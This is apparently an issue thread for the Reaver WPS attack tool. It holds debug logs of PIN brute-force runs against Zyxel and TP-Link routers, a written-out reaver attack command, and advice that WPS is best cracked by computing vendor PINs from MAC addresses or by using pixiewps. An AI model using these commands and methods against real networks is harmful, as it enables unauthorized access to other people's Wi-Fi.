     56 4d 47 33 36 32 35 2d 54 35 30 42               VMG3625-T50B    
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 45 13 05 2a 54 d8 54 a1 40 80 3f b3 be f1 50 ca
WPS: UUID-R - hexdump(len=16): a3 e5 5e 11 b1 68 46 81 a7 47 24 10 68 3b 5f ff
WPS: Building Message M2
WPS:  * Version
WPS:  * Message Type (5)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * UUID-R
WPS:  * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): fe 7c f6 54 86 65 60 b7 d1 51 77 3c f5 d3 bf cd ef b6 03 bd 95 40 c8 bc 7a c0 eb da 67 7d 9a ad f4 cb 99 fc 9a 8e 78 15 d1 3b f5 e3 55 d6 af d5 3e 5f 35 52 4f 14 38 63 40 3d a2 45 3e 9c 7b fe 2e 3e fd 80 d3 84 91 98 46 88 75 64 96 23 ab ef 52 33 bb 63 0e 84 88 8b f8 44 1d ab a9 9f 36 4a 30 69 74 1c a1 c5 0e e2 fa 8d 97 07 6f 8c f6 7c ef 83 6f f0 69 a5 92 41 58 a7 70 f3 2f 42 1d 83 02 f0 f9 79 71 7b 6b 64 40 9f c1 f3 1b 10 4f 8b 2e 45 ed e5 f9 24 1c a9 cd eb c6 d9 6f af fc 94 b9 56 b3 37 9c 1e 9e ed 1b f9 19 77 65 25 6d 72 70 42 3e c1 69 aa 6b 37 77 ee 9b 61 bc ec 1e c0
DH: public value - hexdump(len=192): f0 eb b1 c5 14 d5 ae 77 c7 fa 37 b0 0b 2b 83 72 1c ac 8d 9b 45 b7 47 f4 cd 36 76 cc 2c 88 31 87 6b 47 22 8e 62 dd 53 10 d9 bd 7a eb 13 c4 6b bc 56 19 d1 be e0 af 0e 93 16 2b da 01 94 52 8e ce dc 73 8b 23 ed 51 93 36 5b ef 03 87 fa 68 c7 61 50 f6 f4 7b b0 73 b0 ac bf 0a 26 0e dd 18 f5 78 1f 2f 96 1f 11 6d ce d2 1c 34 79 97 ce 2e a4 03 2e b2 d1 e5 fa 5b 5e 58 57 f3 52 c3 eb 2e a8 11 c4 f0 fb 28 e6 4c fc 2c 45 11 ce 99 a9 16 e6 d2 15 56 50 3a 89 c5 39 29 ad a6 d7 4c b1 ea ad 53 72 5d e7 07 78 61 70 1f 52 69 b9 ea a4 17 09 a3 f2 c0 fa 8c 73 4c 49 cd ee 85 43 20 93 64 0f 3c
WPS: DH Private Key - hexdump(len=192): fe 7c f6 54 86 65 60 b7 d1 51 77 3c f5 d3 bf cd ef b6 03 bd 95 40 c8 bc 7a c0 eb da 67 7d 9a ad f4 cb 99 fc 9a 8e 78 15 d1 3b f5 e3 55 d6 af d5 3e 5f 35 52 4f 14 38 63 40 3d a2 45 3e 9c 7b fe 2e 3e fd 80 d3 84 91 98 46 88 75 64 96 23 ab ef 52 33 bb 63 0e 84 88 8b f8 44 1d ab a9 9f 36 4a 30 69 74 1c a1 c5 0e e2 fa 8d 97 07 6f 8c f6 7c ef 83 6f f0 69 a5 92 41 58 a7 70 f3 2f 42 1d 83 02 f0 f9 79 71 7b 6b 64 40 9f c1 f3 1b 10 4f 8b 2e 45 ed e5 f9 24 1c a9 cd eb c6 d9 6f af fc 94 b9 56 b3 37 9c 1e 9e ed 1b f9 19 77 65 25 6d 72 70 42 3e c1 69 aa 6b 37 77 ee 9b 61 bc ec 1e c0
WPS: DH own Public Key - hexdump(len=192): f0 eb b1 c5 14 d5 ae 77 c7 fa 37 b0 0b 2b 83 72 1c ac 8d 9b 45 b7 47 f4 cd 36 76 cc 2c 88 31 87 6b 47 22 8e 62 dd 53 10 d9 bd 7a eb 13 c4 6b bc 56 19 d1 be e0 af 0e 93 16 2b da 01 94 52 8e ce dc 73 8b 23 ed 51 93 36 5b ef 03 87 fa 68 c7 61 50 f6 f4 7b b0 73 b0 ac bf 0a 26 0e dd 18 f5 78 1f 2f 96 1f 11 6d ce d2 1c 34 79 97 ce 2e a4 03 2e b2 d1 e5 fa 5b 5e 58 57 f3 52 c3 eb 2e a8 11 c4 f0 fb 28 e6 4c fc 2c 45 11 ce 99 a9 16 e6 d2 15 56 50 3a 89 c5 39 29 ad a6 d7 4c b1 ea ad 53 72 5d e7 07 78 61 70 1f 52 69 b9 ea a4 17 09 a3 f2 c0 fa 8c 73 4c 49 cd ee 85 43 20 93 64 0f 3c
WPS: DH Private Key - hexdump(len=192): fe 7c f6 54 86 65 60 b7 d1 51 77 3c f5 d3 bf cd ef b6 03 bd 95 40 c8 bc 7a c0 eb da 67 7d 9a ad f4 cb 99 fc 9a 8e 78 15 d1 3b f5 e3 55 d6 af d5 3e 5f 35 52 4f 14 38 63 40 3d a2 45 3e 9c 7b fe 2e 3e fd 80 d3 84 91 98 46 88 75 64 96 23 ab ef 52 33 bb 63 0e 84 88 8b f8 44 1d ab a9 9f 36 4a 30 69 74 1c a1 c5 0e e2 fa 8d 97 07 6f 8c f6 7c ef 83 6f f0 69 a5 92 41 58 a7 70 f3 2f 42 1d 83 02 f0 f9 79 71 7b 6b 64 40 9f c1 f3 1b 10 4f 8b 2e 45 ed e5 f9 24 1c a9 cd eb c6 d9 6f af fc 94 b9 56 b3 37 9c 1e 9e ed 1b f9 19 77 65 25 6d 72 70 42 3e c1 69 aa 6b 37 77 ee 9b 61 bc ec 1e c0
WPS: DH peer Public Key - hexdump(len=192): 38 90 64 96 c1 49 c6 65 74 0e 65 40 85 41 41 8c 29 26 73 c1 a9 f8 5f 32 46 27 3c e5 b6 98 21 1a 34 cb 4b e8 28 b0 fd 2e 3a 58 6d 18 37 58 d4 a4 dd d6 1d ac f2 8c df 60 11 f2 73 c5 4f 8d 4e fd 7e 4a 07 86 38 7d b6 0a cb 12 e1 ab cb 2d fa 3d 83 4f 3a 95 da 3a 04 32 d4 7e 59 29 90 cc 12 85 7b 88 14 f5 9c 91 92 0f 67 26 c0 88 ba cb 9a b7 09 6e 5f 86 40 bb f6 59 3a c1 bf db 6f df 2a c3 b3 d9 38 4e 66 6e 9c 5e 72 33 8f 8c 71 9d f9 85 36 e8 8a 06 79 14 cb 0d 26 77 81 fb 2b df ae c8 4d e5 a9 87 b8 48 5d 46 d3 73 6a 86 fb 24 1c 60 b7 bc 97 0e c5 d6 7a c4 5b cf b8 12 90 74 04 17
DH: shared key - hexdump(len=192): 31 1e ce d1 27 72 f7 22 68 05 7b 78 17 3b de 4d b8 29 57 ce 04 a1 c5 47 40 2f 36 c8 56 14 0e 40 3d 99 ff 10 55 75 49 4e c3 84 65 b5 87 8c 01 e1 61 a9 b7 fc 78 9f b2 bf 38 72 90 5a 5a 0e 35 c5 f7 d9 55 f0 79 68 1c 88 50 01 a5 07 b7 0a 88 96 96 b9 6f 95 49 87 c7 e7 e6 08 29 10 75 53 f4 8c aa 3d b6 de 42 a9 36 a3 77 53 37 08 3c db ba f0 0d ac 85 42 29 6a 31 aa 05 0f 18 a9 62 56 63 b3 44 52 7b d8 c9 ea 28 d8 c5 58 18 22 32 2b f3 96 2b cc 0f a7 a6 e8 9e ef 08 87 97 26 fd 7c f6 63 9e cb b8 37 8c bb 50 e3 00 ea 46 33 35 3d 1c 53 9e 0f 59 36 c8 eb d5 0e 89 5f 9b dc 66 3b 8e 77
WPS: DH shared key - hexdump(len=192): 31 1e ce d1 27 72 f7 22 68 05 7b 78 17 3b de 4d b8 29 57 ce 04 a1 c5 47 40 2f 36 c8 56 14 0e 40 3d 99 ff 10 55 75 49 4e c3 84 65 b5 87 8c 01 e1 61 a9 b7 fc 78 9f b2 bf 38 72 90 5a 5a 0e 35 c5 f7 d9 55 f0 79 68 1c 88 50 01 a5 07 b7 0a 88 96 96 b9 6f 95 49 87 c7 e7 e6 08 29 10 75 53 f4 8c aa 3d b6 de 42 a9 36 a3 77 53 37 08 3c db ba f0 0d ac 85 42 29 6a 31 aa 05 0f 18 a9 62 56 63 b3 44 52 7b d8 c9 ea 28 d8 c5 58 18 22 32 2b f3 96 2b cc 0f a7 a6 e8 9e ef 08 87 97 26 fd 7c f6 63 9e cb b8 37 8c bb 50 e3 00 ea 46 33 35 3d 1c 53 9e 0f 59 36 c8 eb d5 0e 89 5f 9b dc 66 3b 8e 77
WPS: DHKey - hexdump(len=32): 34 1c 70 bf 6a 8f 84 fc 00 15 9f e6 69 98 83 5a 30 e5 2d 8a 13 3a 54 26 a2 82 8f eb a1 d6 ae 1d
WPS: KDK - hexdump(len=32): 43 e0 0c 10 08 70 b1 2e 63 82 74 57 39 7b eb ac 35 dd 30 46 41 b5 b9 02 16 c3 ca 4b 37 2a 8d 99
WPS: AuthKey - hexdump(len=32): 7e 4c 2b 4b 5f 4a 16 0e 38 1d 6b 05 c7 df c1 7c 36 44 0d 4a 0d 66 f4 77 07 8a 84 67 27 e9 b9 ba
WPS: KeyWrapKey - hexdump(len=16): 30 b9 7c 16 2c 73 9e c2 53 9f ac 09 2d 7a 91 e9
WPS: EMSK - hexdump(len=32): 30 ef 8d 2d b8 14 1e 2d d9 58 86 95 a4 9c 67 81 84 fb 4a e4 5a 75 00 9b 6d 09 1f 71 5f 07 52 4d
WPS:  * Authentication Type Flags
WPS:  * Encryption Type Flags
WPS:  * Connection Type Flags
WPS:  * Config Methods (8c)
WPS:  * Manufacturer
WPS:  * Model Name
WPS:  * Model Number
WPS:  * Serial Number
WPS:  * Primary Device Type
WPS:  * Device Name
WPS:  * RF Bands (0)
WPS:  * Association State
WPS:  * Configuration Error (0)
WPS:  * Device Password ID (0)
WPS:  * OS Version
WPS:  * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 05 1b 1b 0a d2 7a 95 d3 84 c5 44 47 d0 0b 06 06 32 28 88 87 8e e8 6d ca e1 35 00 9d 82 f5 14 6c
WPS: E-Hash2 - hexdump(len=32): 6a 6b d2 0d b8 46 18 e8 92 9a 0f e3 3d fc df 6a 93 05 32 e6 bc 39 df dc cd 96 ab 04 f0 8a 09 f5
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M3 message
WPS: Building Message M4
WPS: Dev Password Len: 8
WPS: Dev Password: 12345670�5�T
WPS: Device Password - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: PSK1 - hexdump(len=16): 47 f1 8d a1 5a 70 d6 50 c9 09 a2 8a 98 eb 1f 2d
WPS: PSK2 - hexdump(len=16): f0 1b 96 a0 7f 78 00 bd 3e 86 82 8c 51 ac 18 41
Allocs OK, building M4 packet
WPS:  * Version
WPS:  * Message Type (8)
WPS:  * Enrollee Nonce
WPS: R-S1 - hexdump(len=16): 61 3f 21 17 8c db be f2 40 35 dc ef a5 c8 90 4b
WPS: R-S2 - hexdump(len=16): a3 56 b4 13 d5 e8 a2 de 00 a4 f0 29 ba 6c 1a 00
WPS:  * R-Hash1
WPS: R-Hash1 - hexdump(len=32): fb 03 a6 e3 ab 12 57 20 8d 91 b8 11 52 8b 6a 3e 46 cd 20 c8 34 3a 67 ac 45 63 45 57 b3 04 0c a8
WPS:  * R-Hash2
WPS: R-Hash2 - hexdump(len=32): 34 74 ca 3a 72 d7 d7 ab 79 07 b6 5f bf d7 c9 c4 7a 97 30 a3 dc 4a 77 f2 63 c9 5a 50 f3 da 16 5a
WPS:  * R-SNonce1
WPS:  * Key Wrap Authenticator
WPS:  * Encrypted Settings
WPS:  * Authenticator
[+] Sending M4 message
send_packet called from send_msg() send.c:116
WPS: Processing received message (len=66 op_code=3)
WPS: Received WSC_NACK
WPS: Unsupported attribute type 0x1049 len=6
WPS: Enrollee terminated negotiation with Configuration Error 18
[+] Received WSC NACK
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
WPS: Invalidating used wildcard PIN
WPS: Invalidated PIN for UUID - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 d4 3d f3 74 f3 92
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     30 30 30 30 35 36 37 38                           00005678        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "00005678"
[+] Associated with D4:3D:F3:XX:XX:XX (ESSID: Zyxel_F391)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
send_packet called from resend_last_packet() send.c:161
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received deauth request
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
^Csend_packet called from send_termination() send.c:142

[+] Session saved.

[mkarne1]

we haven't yet decided how to handle deauth requests. i guess in bruteforce mode it would be best to send deauth, and start over (including auth, assoc) with the current pin.

@rofl0r thanks for the quick reply!

I'm not sure if I fully understand your reply. Is there currently a way to solve this issue? Or is this a known issue that has no fix yet?

[rofl0r]

I'm not sure if I fully understand your reply. Is there currently a way to solve this issue? Or is this a known issue that has no fix yet?

it's a TODO item, so it needs someone to implement handling deauth request in bruteforce mode. the only contributor i'm aware of that still uses bruteforce mode in the age of WPS 2.0 is @feitoi . maybe he can be bothered to implement it.

[mkarne1]

@rofl0r Okay got it, then I think we can close this issue. Just one last question: Is there any other / better / recommend way of cracking WPS networks?

[rofl0r]

the bruteforce method is almost useless these days, the prefered method is to identify the algorithm used by the vendor to generate the wps pin (often from mac address), calculate the right pin in advance and use reaver or oneshot to send that single pin. 3wifi has a website with an online keygen for many router models. that or pixiewps, if the router is vulnerable.

[mkarne1]

@rofl0r Thanks a lot, I really appreciate your help!

[soxrok2212]

Thank you @mkarne1 for being patient and polite. It’s hard to come by these days. In the mean time, you could try the tool “bully” but I’m unsure of the state of that one too.

[mkarne1]

@soxrok2212 nothing to thank me for, you guys are providing all of us with a great, free tool and provide great, free support on top. The least I can be is friendly! :)

[feitoi]

I've analyzed a lot of death request, there's nothing to do. If to improve a little more the performance of the brute force mode is to decrease some definitions like EAPOL_START_MAX_TRIES, MAX_ASSOC_FAILURES and WARN_FAILURE_COUNT to 5 or less

I did a test with a router that does not have WPS LOCK with external association, the performance dropped to 53 seconds/PIN (with EAPOL_START_MAX_TRIES to 5), while without external association it stays 7 seconds/PIN. When with external association, every PIN attempt comes a problem with EAPOL START

root@kali:~# reaver -b 74:EA:3A:XX:XX:XX -c 4 -i wlan1mon -vvNA

Reaver v1.6.6-git-54-g2260cb4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan1mon to channel 4
[?] Restore previous session for 74:EA:3A:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from 74:EA:3A:XX:XX:XX
[+] Received beacon from 74:EA:3A:XX:XX:XX
[+] Vendor: AtherosC
[+] Trying pin "12345670"
[+] Associated with 74:EA:3A:XX:XX:XX (ESSID: TP-LINK_74EA3A)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received WSC NACK (reason: 0x0000)
[+] Sending WSC NACK
[+] Trying pin "00005678"
[+] Associated with 74:EA:3A:XX:XX:XX (ESSID: TP-LINK_74EA3A)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 5 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "00005678"
[+] Associated with 74:EA:3A:XX:XX:XX (ESSID: TP-LINK_74EA3A)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received WSC NACK (reason: 0x0000)
[+] Sending WSC NACK
[+] Trying pin "01235678"
[+] Associated with 74:EA:3A:XX:XX:XX (ESSID: TP-LINK_74EA3A)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 5 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin "01235678"
[+] Associated with 74:EA:3A:XX:XX:XX (ESSID: TP-LINK_74EA3A)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received WSC NACK (reason: 0x0000)
[+] Sending WSC NACK
[+] Trying pin "11115670"
[+] Associated with 74:EA:3A:XX:XX:XX (ESSID: TP-LINK_74EA3A)
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
...

[mkarne1]

the bruteforce method is almost useless these days, the prefered method is to identify the algorithm used by the vendor to generate the wps pin (often from mac address), calculate the right pin in advance and use reaver or oneshot to send that single pin. 3wifi has a website with an online keygen for many router models. that or pixiewps, if the router is vulnerable.

@rofl0r sorry to bother you again, but do you happen to have an invite code? The WPS PIN generator is only accessible for members and registration is limited to those who have a code.

According to this post I can buy it from binarymaster, but he wasn't online for a few months and I'm not sure if/when he will read my message.

Thanks for your time & best regards.

[rofl0r]

@feitoi

[+] Received deauth request

problem is with routers that send deauth request during a WPS tx. reaver currently doesn't handle it at all which makes bruteforce mode stuck.

@mkarne1 the wpspin site has 2 forms, the right one (database search) is only for members, the left one available for everyone. it uses javascript to generate pins with the selected method from the mac address you enter. i don't have an invitation code for the site.